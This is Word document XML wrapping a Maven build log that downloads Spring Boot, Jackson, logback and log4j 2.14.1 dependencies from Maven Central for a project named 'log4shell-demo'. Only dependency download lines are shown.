    <w:p w14:paraId="0553A78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https://repo.maven.apache.org/maven2/org/jboss/jboss-parent/36/jboss-parent-36.pom (66 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E1E6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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/jackson-bom/2.12.5/jackson-bom-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F189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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/jackson-bom/2.12.5/jackson-bom-2.12.5.pom (17 kB at 615 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D33AD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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/jackson-parent/2.12/jackson-parent-2.12.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228145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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/jackson-parent/2.12/jackson-parent-2.12.pom (7.5 kB at 228 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546455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https://repo.maven.apache.org/maven2/com/fasterxml/oss-parent/41/oss-parent-41.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2840AA0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https://repo.maven.apache.org/maven2/com/fasterxml/oss-parent/41/oss-parent-41.pom (23 kB at 754 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C8AF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https://repo.maven.apache.org/maven2/org/glassfish/jersey/jersey-bom/2.33/jersey-bom-2.33.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550E42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https://repo.maven.apache.org/maven2/org/glassfish/jersey/jersey-bom/2.33/jersey-bom-2.33.pom (19 kB at 455 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C736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https://repo.maven.apache.org/maven2/org/eclipse/ee4j/project/1.0.6/project-1.0.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21839E7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https://repo.maven.apache.org/maven2/org/eclipse/ee4j/project/1.0.6/project-1.0.6.pom (13 kB at 555 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51622A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https://repo.maven.apache.org/maven2/org/eclipse/jetty/jetty-bom/9.4.43.v20210629/jetty-bom-9.4.43.v20210629.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5BA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https://repo.maven.apache.org/maven2/org/eclipse/jetty/jetty-bom/9.4.43.v20210629/jetty-bom-9.4.43.v20210629.pom (18 kB at 477 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B38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https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.7.2/junit-bom-5.7.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249239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https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.7.2/junit-bom-5.7.2.pom (5.1 kB at 154 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A47B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https://repo.maven.apache.org/maven2/org/jetbrains/kotlin/kotlin-bom/1.5.31/kotlin-bom-1.5.31.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791814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https://repo.maven.apache.org/maven2/org/jetbrains/kotlin/kotlin-bom/1.5.31/kotlin-bom-1.5.31.pom (9.3 kB at 322 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6D2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https://repo.maven.apache.org/maven2/org/jetbrains/kotlinx/kotlinx-coroutines-bom/1.5.2/kotlinx-coroutines-bom-1.5.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058B271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https://repo.maven.apache.org/maven2/org/jetbrains/kotlinx/kotlinx-coroutines-bom/1.5.2/kotlinx-coroutines-bom-1.5.2.pom (4.1 kB at 164 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46680E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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-bom/2.14.1/log4j-bom-2.14.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105E5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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-bom/2.14.1/log4j-bom-2.14.1.pom (8.1 kB at 289 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4102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https://repo.maven.apache.org/maven2/org/apache/logging/logging-parent/3/logging-parent-3.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFCC9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https://repo.maven.apache.org/maven2/org/apache/logging/logging-parent/3/logging-parent-3.pom (3.1 kB at 125 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC5F95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https://repo.maven.apache.org/maven2/org/apache/apache/23/apache-23.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB181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https://repo.maven.apache.org/maven2/org/apache/apache/23/apache-23.pom (18 kB at 542 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD7AE2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https://repo.maven.apache.org/maven2/io/micrometer/micrometer-bom/1.7.4/micrometer-bom-1.7.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F41D8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https://repo.maven.apache.org/maven2/io/micrometer/micrometer-bom/1.7.4/micrometer-bom-1.7.4.pom (6.9 kB at 229 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13E7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https://repo.maven.apache.org/maven2/io/netty/netty-bom/4.1.68.Final/netty-bom-4.1.68.Final.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B077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https://repo.maven.apache.org/maven2/io/netty/netty-bom/4.1.68.Final/netty-bom-4.1.68.Final.pom (12 kB at 451 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6E1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https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D271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https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom (4.8 kB at 124 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508225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https://repo.maven.apache.org/maven2/com/oracle/database/jdbc/ojdbc-bom/21.1.0.0/ojdbc-bom-21.1.0.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE77D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https://repo.maven.apache.org/maven2/com/oracle/database/jdbc/ojdbc-bom/21.1.0.0/ojdbc-bom-21.1.0.0.pom (12 kB at 443 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD594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https://repo.maven.apache.org/maven2/io/prometheus/simpleclient_bom/0.10.0/simpleclient_bom-0.10.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB6A7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https://repo.maven.apache.org/maven2/io/prometheus/simpleclient_bom/0.10.0/simpleclient_bom-0.10.0.pom (4.9 kB at 104 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604168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https://repo.maven.apache.org/maven2/io/prometheus/parent/0.10.0/parent-0.10.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849117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https://repo.maven.apache.org/maven2/io/prometheus/parent/0.10.0/parent-0.10.0.pom (7.5 kB at 312 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362F5D7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https://repo.maven.apache.org/maven2/io/r2dbc/r2dbc-bom/Arabba-SR10/r2dbc-bom-Arabba-SR10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52208A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https://repo.maven.apache.org/maven2/io/r2dbc/r2dbc-bom/Arabba-SR10/r2dbc-bom-Arabba-SR10.pom (4.3 kB at 139 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457895C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https://repo.maven.apache.org/maven2/io/projectreactor/reactor-bom/2020.0.11/reactor-bom-2020.0.11.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1721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https://repo.maven.apache.org/maven2/io/projectreactor/reactor-bom/2020.0.11/reactor-bom-2020.0.11.pom (4.2 kB at 141 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186471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https://repo.maven.apache.org/maven2/io/rsocket/rsocket-bom/1.1.1/rsocket-bom-1.1.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606E39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https://repo.maven.apache.org/maven2/io/rsocket/rsocket-bom/1.1.1/rsocket-bom-1.1.1.pom (2.6 kB at 94 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FABA0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https://repo.maven.apache.org/maven2/org/springframework/data/spring-data-bom/2021.0.5/spring-data-bom-2021.0.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764B38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https://repo.maven.apache.org/maven2/org/springframework/data/spring-data-bom/2021.0.5/spring-data-bom-2021.0.5.pom (5.7 kB at 178 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED055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https://repo.maven.apache.org/maven2/org/springframework/spring-framework-bom/5.3.10/spring-framework-bom-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F5D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https://repo.maven.apache.org/maven2/org/springframework/spring-framework-bom/5.3.10/spring-framework-bom-5.3.10.pom (5.7 kB at 177 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206FC37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https://repo.maven.apache.org/maven2/org/springframework/integration/spring-integration-bom/5.5.4/spring-integration-bom-5.5.4.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB901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https://repo.maven.apache.org/maven2/org/springframework/integration/spring-integration-bom/5.5.4/spring-integration-bom-5.5.4.pom (9.1 kB at 381 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C2A7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https://repo.maven.apache.org/maven2/org/springframework/security/spring-security-bom/5.5.2/spring-security-bom-5.5.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209182D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https://repo.maven.apache.org/maven2/org/springframework/security/spring-security-bom/5.5.2/spring-security-bom-5.5.2.pom (5.7 kB at 173 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095619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https://repo.maven.apache.org/maven2/org/springframework/session/spring-session-bom/2021.0.2/spring-session-bom-2021.0.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472791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https://repo.maven.apache.org/maven2/org/springframework/session/spring-session-bom/2021.0.2/spring-session-bom-2021.0.2.pom (2.7 kB at 105 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF198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C8364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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ACAFE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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E4EC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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6745BA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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-maven-plugin/2.5.5/spring-boot-maven-plugin-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792075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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-maven-plugin/2.5.5/spring-boot-maven-plugin-2.5.5.pom (3.1 kB at 126 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D542E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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-maven-plugin/2.5.5/spring-boot-maven-plugin-2.5.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EE68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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-maven-plugin/2.5.5/spring-boot-maven-plugin-2.5.5.jar (102 kB at 2.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722EC0D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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A956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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.pom (5.2 kB at 148 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2956BE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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/31/maven-plugins-31.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE00AD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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/31/maven-plugins-31.pom (10 kB at 400 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D8E9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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/31/maven-parent-31.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023E3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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/31/maven-parent-31.pom (43 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD35CB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https://repo.maven.apache.org/maven2/org/apache/apache/19/apache-19.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069868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https://repo.maven.apache.org/maven2/org/apache/apache/19/apache-19.pom (15 kB at 673 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFCC4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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFFBC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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.1.0/maven-clean-plugin-3.1.0.jar (30 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBC0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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.2.0/maven-resources-plugin-3.2.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36446C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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.2.0/maven-resources-plugin-3.2.0.pom (8.1 kB at 252 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F122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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/34/maven-plugins-34.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CC5A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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/34/maven-plugins-34.pom (11 kB at 486 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C28D8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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/34/maven-parent-34.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC78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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/34/maven-parent-34.pom (43 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5756FF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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.2.0/maven-resources-plugin-3.2.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA66DC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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-resources-plugin/3.2.0/maven-resources-plugin-3.2.0.jar (33 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECDB3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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.1/maven-compiler-plugin-3.8.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F76F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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.1/maven-compiler-plugin-3.8.1.pom (12 kB at 430 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D632BB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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/33/maven-plugins-33.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20909A0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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/33/maven-plugins-33.pom (11 kB at 356 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66716E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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/33/maven-parent-33.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A670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https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/33/maven-parent-33.pom (44 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1428EA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https://repo.maven.apache.org/maven2/org/apache/apache/21/apache-21.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B606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https://repo.maven.apache.org/maven2/org/apache/apache/21/apache-21.pom (17 kB at 713 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FD0F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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.1/maven-compiler-plugin-3.8.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FB2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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-compiler-plugin/3.8.1/maven-compiler-plugin-3.8.1.jar (62 kB at 1.9 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0D7A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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.2/maven-surefire-plugin-2.22.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FD66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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.2/maven-surefire-plugin-2.22.2.pom (5.0 kB at 151 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59408D3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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire/2.22.2/surefire-2.22.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75B3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https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire/2.22.2/surefire-2.22.2.pom (26 kB at 1.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6D29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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.2/maven-surefire-plugin-2.22.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E995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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-surefire-plugin/2.22.2/maven-surefire-plugin-2.22.2.jar (41 kB at 1.5 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C55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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.2.0/maven-jar-plugin-3.2.0.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0866A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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.2.0/maven-jar-plugin-3.2.0.pom (7.3 kB at 302 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635761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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.2.0/maven-jar-plugin-3.2.0.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A509B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https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-jar-plugin/3.2.0/maven-jar-plugin-3.2.0.jar (29 kB at 1.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717860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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32219C3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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.pom (3.0 kB at 123 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7211C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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921543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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.pom (3.1 kB at 106 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA98A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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2934BC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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.pom (2.2 kB at 101 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740C6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https://repo.maven.apache.org/maven2/org/springframework/spring-core/5.3.10/spring-core-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B087C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https://repo.maven.apache.org/maven2/org/springframework/spring-core/5.3.10/spring-core-5.3.10.pom (2.0 kB at 84 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA558C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https://repo.maven.apache.org/maven2/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B1A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https://repo.maven.apache.org/maven2/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.pom (1.8 kB at 83 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E4BD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https://repo.maven.apache.org/maven2/org/springframework/spring-context/5.3.10/spring-context-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0D8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https://repo.maven.apache.org/maven2/org/springframework/spring-context/5.3.10/spring-context-5.3.10.pom (2.6 kB at 89 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B3DB8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https://repo.maven.apache.org/maven2/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F99C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https://repo.maven.apache.org/maven2/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.pom (2.2 kB at 96 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA135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https://repo.maven.apache.org/maven2/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC3F3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https://repo.maven.apache.org/maven2/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.pom (2.0 kB at 78 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B719B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https://repo.maven.apache.org/maven2/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60616D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https://repo.maven.apache.org/maven2/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.pom (2.1 kB at 83 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B22B2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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F44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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.pom (2.1 kB at 80 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5927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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09514A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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.pom (2.5 kB at 113 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA552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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77670F1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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.pom (13 kB at 576 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BAC62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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-parent/1.2.6/logback-parent-1.2.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635106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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-parent/1.2.6/logback-parent-1.2.6.pom (19 kB at 794 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F0C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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43212A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https://repo.maven.apache.org/maven2/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.pom (4.2 kB at 161 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65C1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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC9FC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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.pom (3.8 kB at 192 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC227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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.32/slf4j-parent-1.7.32.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF41C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https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.32/slf4j-parent-1.7.32.pom (14 kB at 575 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF0AE1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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B52A8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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.pom (7.0 kB at 226 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F81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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j/2.14.1/log4j-2.14.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FAB5F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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j/2.14.1/log4j-2.14.1.pom (68 kB at 1.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2332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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106192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https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.pom (14 kB at 360 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4508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https://repo.maven.apache.org/maven2/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156CE0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https://repo.maven.apache.org/maven2/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.pom (990 B at 35 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFBBD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https://repo.maven.apache.org/maven2/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309926B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https://repo.maven.apache.org/maven2/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.pom (16 kB at 650 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6EC66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https://repo.maven.apache.org/maven2/jakarta/annotation/ca-parent/1.3.5/ca-parent-1.3.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABDE5F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https://repo.maven.apache.org/maven2/jakarta/annotation/ca-parent/1.3.5/ca-parent-1.3.5.pom (2.8 kB at 127 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622BDD1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https://repo.maven.apache.org/maven2/org/eclipse/ee4j/project/1.0.5/project-1.0.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE9E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https://repo.maven.apache.org/maven2/org/eclipse/ee4j/project/1.0.5/project-1.0.5.pom (13 kB at 573 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C95A7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https://repo.maven.apache.org/maven2/org/yaml/snakeyaml/1.28/snakeyaml-1.28.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744938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https://repo.maven.apache.org/maven2/org/yaml/snakeyaml/1.28/snakeyaml-1.28.pom (37 kB at 1.3 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A02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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731103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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.pom (3.1 kB at 103 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB7F1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https://repo.maven.apache.org/maven2/org/springframework/spring-web/5.3.10/spring-web-5.3.10.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B75C7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https://repo.maven.apache.org/maven2/org/springframework/spring-web/5.3.10/spring-web-5.3.10.pom (2.2 kB at 92 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126218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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584F91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https://repo.maven.apache.org/maven2/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.pom (15 kB at 591 kB/s)</w:t>
      </w:r>
    </w:p>
